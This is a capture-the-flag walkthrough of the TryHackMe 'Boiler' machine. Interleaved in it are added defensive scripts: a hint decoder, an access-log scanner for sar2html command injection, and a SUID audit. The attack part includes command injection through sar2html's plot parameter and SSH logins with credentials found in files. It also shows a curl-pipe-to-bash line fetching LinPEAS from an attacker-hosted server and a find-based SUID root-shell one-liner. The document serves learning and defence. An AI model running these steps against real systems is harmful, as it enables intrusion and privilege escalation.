Boiler CTF is a boot2root machine on TryHackMe with the difficulty rating “Medium”. After enumerating for a while we find a vulnerable web application. It contains a command injection vulnerability, which we use to read SSH credentials. After logging into the machine with these credentials, we find a “backup.sh” script inside the home folder. This script contains another set of credentials, which are then used to SSH into the machine again as a different user. The final privilege escalation to root is done through a misconfigured SUID binary.
First of all we start with an Nmap scan. The initial scan shows us 3 open ports:
sudo nmap 10.10.120.184 -oN Nmap/initial
The next scan covers all ports. Here we find out that four ports are actually open.
sudo nmap 10.10.120.184 -p- -oN Nmap/all
Another Nmap scan with default scripts and service detection gives us more detail about the services running on the target.
sudo nmap 10.10.120.184 -p21,80,10000,55007 -sC -sV -O -T5 -oN Nmap/scripts
After that we can inspect the landing page of the web server on port 80. It is the default Apache 2 Ubuntu landing page.
We can now check whether there are any hidden directories. A good first step is to look for a “robots.txt” file, and indeed there is one.
All of the listed directories are just rabbit holes. But there are strange numbers inside the “robots.txt” file. Taking a closer look at these numbers reveals that they fall within the printable ASCII range. So we can quickly use Python to decode the message:
text = "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075".split(" ")
tmp = ""
for i in text:
    tmp += chr(int(i))  # each decimal value is one ASCII character
print(tmp)
The resulting string looks like Base64. To decode it we can use CyberChef.
The decoded output looks like an MD5 hash. So we can use a site like Crackstation to crack it.
Crackstation cracks it successfully. But spoiler alert: this is also a rabbit hole.
Next we can enumerate the FTP service on port 21. As the Nmap scan showed, it allows anonymous login. So connect to the FTP server via the following command.
We can then log in with the username “anonymous” and a blank password. Listing the contents shows that there is a file called “.info.txt”. We can download this file.
Opening the file shows text that looks ROT13-encoded.
We can easily decode it with CyberChef. But this is also just a rabbit hole.
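The robots.txt numbers and the FTP note are both layered encodings, and the writeup decodes them by hand with CyberChef. The following script is an added example (not part of the original writeup) that walks the same chain in code: decimal ASCII codes, then strict Base64, then a check whether the result is shaped like a hex digest of a known length. The number string is copied from the page; the ROT13 sample at the end is constructed, not the contents of “.info.txt”.

```python
import base64
import codecs
import re
from typing import Optional

# The decimal list copied from the writeup's robots.txt (44 numbers, one per character).
ROBOTS_NUMBERS = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 "
    "090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 "
    "089 109 070 104 078 084 069 049 079 068 081 075"
)

# Digest lengths in hex characters; MD5 is the one the writeup ends up with.
HEX_DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}


def decimal_ascii_to_text(numbers: str) -> str:
    """Map whitespace-separated decimal codes onto their ASCII characters."""
    return "".join(chr(int(n)) for n in numbers.split())


def try_base64(text: str) -> Optional[str]:
    """Strictly decode Base64; return None when the input is not valid Base64."""
    try:
        raw = base64.b64decode(text, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None


def classify_hex_digest(text: str) -> Optional[str]:
    """Name the hash family a lowercase hex string is shaped like, else None."""
    text = text.strip()
    if re.fullmatch(r"[0-9a-f]+", text):
        return HEX_DIGEST_LENGTHS.get(len(text))
    return None


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one function both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def decode_robots_hint(numbers: str) -> dict:
    """Run the three stages the writeup walks through and record each result."""
    ascii_text = decimal_ascii_to_text(numbers)
    decoded = try_base64(ascii_text)
    return {
        "ascii": ascii_text,
        "base64_decoded": decoded.strip() if decoded is not None else None,
        "looks_like": classify_hex_digest(decoded) if decoded is not None else None,
    }


if __name__ == "__main__":
    for stage, value in decode_robots_hint(ROBOTS_NUMBERS).items():
        print(f"{stage:>15}: {value}")
    # Constructed sample, not the file from the FTP server.
    print(rot13("Guvf vf n grfg"))
```

The shape check only says that the value has the length of an MD5 digest; it does not prove what produced it, which is exactly why the cracked value turns out to be a dead end here.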
Next we can look at the web service running on port 10000. Opening https://10.10.120.184:10000/ shows that it is running Webmin. But we cannot exploit this service.
Next we have to continue enumerating. We will use ffuf to enumerate directories of the web server on port 80. First of all, run an enumeration attempt with the “directory-list-2.3-medium.txt” wordlist from SecLists. The following ffuf command starts the enumeration:
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.120.184/FUZZ
We will see that two directories exist: “/manual” and “/joomla”.
Next we continue enumerating inside the “/joomla” page. With the same wordlist we can find the directory “_files”.
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.120.184/joomla/FUZZ --recursion --recursion-depth 1
This string is double-encoded with Base64. But unfortunately it is also just a rabbit hole.
ffuf finds no other interesting files with this wordlist, so I started another enumeration attempt with a different wordlist.
ffuf -w /usr/share/wordlists/dirb/common.txt:FUZZ -u http://10.10.120.184/joomla/FUZZ --recursion --recursion-depth 1 -e txt
This time I could find another directory. The directory is called “_test”.
It is running “sar2html”:
A quick Google search for exploits shows that there is a command injection vulnerability in “sar2html 3.2.1”.
We will be using the vulnerability described at https://www.exploit-db.com/exploits/47204. We can inject commands into the “plot” parameter, and the output appears as an option in the “Select Host” drop-down menu. With this knowledge we can inject the whoami command to test whether this web app is vulnerable.
And it works! So we can now list the contents of the directory. We will find an interesting file called “log.txt”.
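From the defender's side, every one of these injected requests lands in the web server's access log with the “plot” parameter carrying shell metacharacters. The following script is an added example (not from the writeup or from sar2html) that parses Apache combined-format log lines and flags exactly that pattern. The log lines are constructed; the path mirrors the “/joomla/_test” location from the writeup, and treating “plot” as the only watched parameter is an assumption based on the exploit the page cites.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined"-style access log; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r"(?P<status>\d{3}) \S+"
)

# Parameters that should only ever carry plain values (assumed: "plot", the one the
# writeup injects into) and the shell metacharacters that never belong in them.
WATCHED_PARAMS = {"plot"}
SHELL_META = re.compile(r"[;|&`$\n]")

# Constructed log lines, not a real capture from the target.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /joomla/_test/index.php?plot=1 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [10/Jan/2024:10:00:07 +0000] "GET /joomla/_test/index.php?plot=%3Bwhoami HTTP/1.1" 200 2048',
    '10.0.0.5 - - [10/Jan/2024:10:00:10 +0000] "GET /joomla/_test/ HTTP/1.1" 200 500',
    '10.0.0.9 - - [10/Jan/2024:10:00:12 +0000] "GET /joomla/_test/index.php?plot=%3Bls%20-la HTTP/1.1" 200 4096',
    "garbage line that does not parse",
]


def parse_line(line: str):
    """Return the captured fields of one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target: str):
    """Return (name, decoded value) for watched parameters carrying shell metacharacters."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl URL-decodes the values, so %3B is compared as ';'
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in WATCHED_PARAMS and SHELL_META.search(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Return one finding per request whose watched parameter looks like an injection."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in suspicious_params(rec["target"]):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "param": name, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']}  {f['param']}={f['value']!r}")
```

Decoding before matching matters: the injected semicolon arrives as “%3B” on the wire, so a rule that greps the raw log for “;” misses it. The same check generalises to any parameter a legacy PHP application hands to a shell.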
We can also read this file with the
It contains a username and a password. We will try to use these to log into the machine via SSH. Remember that the SSH server is running on port 55007.
ssh -p 55007 firstname.lastname@example.org
After the SSH login we can spot a file called “backup.sh” inside the home folder of the “basterd” user. We can also read this file. It contains the username “stoner” and his password.
We can now log in as “stoner” via SSH:
ssh -p 55007 email@example.com
We can now read the “.secret” file inside the home folder of the “stoner” user.
To find misconfigurations on the server, I use LinPEAS. I downloaded it to my attacker machine and serve it with a simple web server to transfer it to the victim. Run the following command inside the directory where you have stored linpeas.sh on your attacker machine:
python3 -m http.server
After that you can run the following command on the victim to download and run the script:
curl http://[VPN IP]:8000/linpeas.sh | bash
After waiting for the scan and analyzing the output, I could spot a misconfigured SUID binary:
We can now spawn a root shell by running the following command:
find . -exec /bin/sh -p \; -quit
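The SUID bit on “find” is the kind of thing an administrator should catch before an attacker does. The following audit script is an added example (not from the writeup or from LinPEAS) that classifies SUID files into an expected baseline, shell-capable tools that must never carry the bit, and unknown files to review. Both name lists are assumptions for the example rather than authoritative; the sample entries in the test are constructed, while collect_suid() walks a real filesystem.

```python
import os
import stat

# Root-owned SUID binaries a stock Ubuntu install ships by design. Assumed baseline for
# this example, not an authoritative list; build yours from a clean reference host.
EXPECTED_SUID = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
    "mount", "umount", "pkexec", "fusermount",
}

# Programs that can spawn a shell or read and write arbitrary files. With the SUID bit
# they hand the owner's privileges to any local user; "find" is the one abused here.
SHELL_CAPABLE = {
    "find", "bash", "sh", "dash", "vim", "vi", "nano", "less", "more",
    "python", "python3", "perl", "awk", "env", "cp", "mv",
}

# Pseudo filesystems that are noise for a SUID walk.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def classify(path: str, mode: int, uid: int):
    """Return a severity for a file, or None if it carries no SUID bit."""
    if not mode & stat.S_ISUID:
        return None
    name = os.path.basename(path)
    if name in SHELL_CAPABLE:
        return "critical"  # shell-capable tool running as its owner
    if name in EXPECTED_SUID and uid == 0:
        return "expected"
    return "review"  # unknown SUID file: verify it is needed


def audit(entries):
    """entries: iterable of (path, mode, owner uid). Returns findings worth a look, worst first."""
    order = {"critical": 0, "review": 1}
    findings = []
    for path, mode, uid in entries:
        sev = classify(path, mode, uid)
        if sev in order:
            findings.append({"path": path, "severity": sev, "uid": uid})
    findings.sort(key=lambda f: (order[f["severity"]], f["path"]))
    return findings


def collect_suid(root="/"):
    """Walk a live filesystem and yield (path, mode, uid) for regular SUID files."""
    for dirpath, dirnames, files in os.walk(root, onerror=lambda _e: None):
        # prune pseudo filesystems in place so os.walk does not descend into them
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for fn in files:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield p, st.st_mode, st.st_uid


if __name__ == "__main__":
    for f in audit(collect_suid("/")):
        print(f"{f['severity']:>8}  uid={f['uid']:<5} {f['path']}")
```

Running this from a cron job and diffing the output against the previous run turns a one-off LinPEAS finding into a standing control: a SUID bit appearing on “find” shows up as a new critical line the next morning.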
Finally we can read the root flag.
Never rely on security through obscurity. It only makes an attack take longer; it won’t prevent it. So the vulnerable “sar2html” service should be updated. Furthermore, credentials should not be stored in plain text, and misconfigured SUID bits should be avoided. As we can see in the output above, “stoner” is in the “lxd” group. This group can also be abused to escalate privileges, so “stoner” should be removed from the “lxd” group if he does not need access to it.